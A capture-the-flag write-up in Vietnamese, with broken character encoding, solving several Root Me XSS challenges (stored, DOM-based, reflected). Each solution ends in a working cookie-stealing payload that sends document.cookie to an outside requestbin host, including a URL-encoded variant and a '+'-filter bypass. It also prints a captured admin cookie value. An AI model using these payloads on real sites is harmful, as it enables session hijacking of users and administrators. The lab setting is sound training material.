โ๏ธ[Root me] Writeup XSS Challenge
XSS - Stored 1
Trong bร i nร y nร y basic, khi vร o chรบng ta sแบฝ thแบฅy interface nhฦฐ nร y:
Cรณ form ฤiแปn Title vร Mesage khi ฤรณ chรบg ta hรฃy thแปญ gแปญi lรชn mแปt ฤoแบกn message nhฦฐ ngฦฐแปi dรนng bรฌnh thฦฐแปng, tiแบฟp ฤรณ thแปญ chรจn ฤoแบกn script: <script>alert(1)</script>
Khi ฤรณ chรบng ta thแบฅy script nร y chรจn thร nh cรดng vร o span tag vร o payload thร nh cรดng tแปซ ฤรณ chรบng ta thay alert() thร nh document.location="https://eoqnvkovg5mm73q.m.pipedream.net?c="+document.cookie
Chแป mแปt phรบt sau cookie sแบฝ ฤฦฐแปฃc gแปญi vแป requestbin
XSS DOM Based โ Introduction
Trong bร i nร y thรฌ khi vร o nรณ cho mแปt input nhแบญp tแปซ 0 tแปi 100, thแปญ nhแบญp 100 xem nรณ sแบฝ ra gรฌ:
Ctr+U ฤแป mแป source code lรชn xem nhฦฐ nร o:
แป ฤรขy ta thแบฅy rแบฑng cรณ mแปt biแบฟn lร number vร khi ta nhแบญp sแป lร biแบฟn number ฤฦฐแปฃc gรกn vร o:
ร tฦฐแปng bร i nร y thรฌ chรบng ta sแบฝ break out JS bแบฑng cรกch '; hoแบทc '-
';alert(1)// hoแบทc '-alert(1)//
Payload thร nh cรดng!!! Khi ฤรณ ฤoแบกn script nรณ sแบฝ nhฦฐ nร y:
Vแบญy nhฦฐ bร i trรชn chรบng ta lแบกi thay payload nhฦฐ nร y trรชn URL
http://my-url/number=%27%3Bdocument.location%3D%22https%3A%2F%2Feoqnvkovg5mm73q.m.pipedream.net%3Fc%3D%22%2Bdocument.cookie//
Vรฌ XSS lร lแป hแปng client side nรชn chรบng ta sแบฝ gแปญi nรณ tแปซ contact cho admin:
Khi ฤรณ con bot sแบฝ leak cookie cแปงa admin vแป khi admin nhแบฅp vร o ฤแปc:
XSS Reflected
Bร i nร y nhรฌn qua thรฌ khรดng cรณ form ฤแป test XSS mร ฤแป bร i lร Reflected XSS nรชn chรบng ta sแบฝ xem xรฉt แป URL:
Nแบฟu chรบng ta thay ฤแปi p=sha1 thรฌ nรณ sแบฝ ra gรฌ:
Nรณ sแบฝ ra nhฦฐ nร y, tiแบฟp ฤรณ mแป source code kiแบฟm tra:
Thแบฅy rแบฑng p=sha1 lร giรก trแป cแปงa thuแปc tรญnh href nhฦฐ vแบญy chรบng ta cแบงn suy nghฤฉa lร m sao ฤแป chรจn ฤฦฐแปฃc vร o ฤรขy.
Dรนng thuแปc tรญnh onmousover hoแบทc onclick ฤแป thรชm vร o thแบป <a> nhฦฐng nรชn nhแป rแบฑng thฦฐแปng thรฌ admin sแบฝ khรดng nhแบฅp vร o link lแบก nรชn แป ฤรขy chรบng ta chแปn omouseover, khi ฤรณ ฤoแบกn gแบฏn shau p sแบฝ lร :
sha1' onmousemove='alert(1)
Khi ฤรณ payload sแบฝ nhฦฐ nร y:
sha1' onmousemove='document.location="https://eoqnvkovg5mm73q.m.pipedream.net?c=".concat(document.cookie)
Nรชn nhแป rแบฑng chรบng ta phแบฃi dรนng nแปi chuแปi .concat trong JS vรฌ dแบฅu + ฤรฃ bแป filter ฤi
Sau khi gแปญi vร report cho admin thรฌ chรบng ta chแป mแปt phรบt ฤแป con bot leak thรดng tin vร gแปญi vแป requestbin
XSS - Stored 2
Interface khรก giแปng vแปi bร i Stored 1 nhฦฐng chแป cรณ ฤiแปu nรณ thรชm status
Bแบญt source code lรชn kiแปm tra thรฌ cรณ mแปt class ฤฦฐแปฃc ฤแบทt lร invite
ร tฦฐแปng sแบฝ dรนng Burp suite ฤแป bแบฏt hร nh ฤแปng:
Nhแบญn thแบฅy Cookie cรณ status:invite, vแบญy thรฌ chรบng ta hay thแปญ thay ฤแปi giรก trแป status xem nhฦฐ nร o:
Khi ฤรณ chรบng ta forward ฤแป trang web gแปญi lรชn sever vร nhแบญn ra rแบฑng status ฤรฃ thay ฤแปi
ร tฦฐแปng bรขy giแป lร break out ฤoแบกn souce code nร y:
แป ฤรขy payload lรบc ฤรณ sแบฝ lร "><img scr=1 onerror=alert(1) /> ("> ฤแป ฤรณng thแบป i lแบกi)
Payload thร nh cรดng giแป chแป cแบงn thay alert() thร nh document....vร gแปญi nรณ lรชn, ฤแปฃi mแปt lรบc thรฌ ฤฦฐแปฃc trแบฃ vแป ADMIN_COOKIE nhฦฐ nร y<<<Lฦฐu รฝ: cรณ thแป dรนng .concat ฤแป nแปi chuแปi nแบฟu bแป filter dแบฅu + >>
Lรบc ฤแบงu mรฌnh nghฤฉa ฤรขy lร flag nhฦฐng khรดng ฤรบng, thรฌ chแปฃt nhแบญn ra status nรณ lร invite thรฌ mรฌnh cแบงn thay ฤแปi cookie vร reload lแบกi trang:
Cookie: status=invite; ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7F
Cรกc phแบงn tiแบฟp theo sแบฝ ฤฦฐแปฃc cแบญp nhแบญt trong thแปi gian sแปm nhแบฅt cแบฃm ฦกn cรกc bแบกn ฤรฃ ฤแปc bร i...
Last updated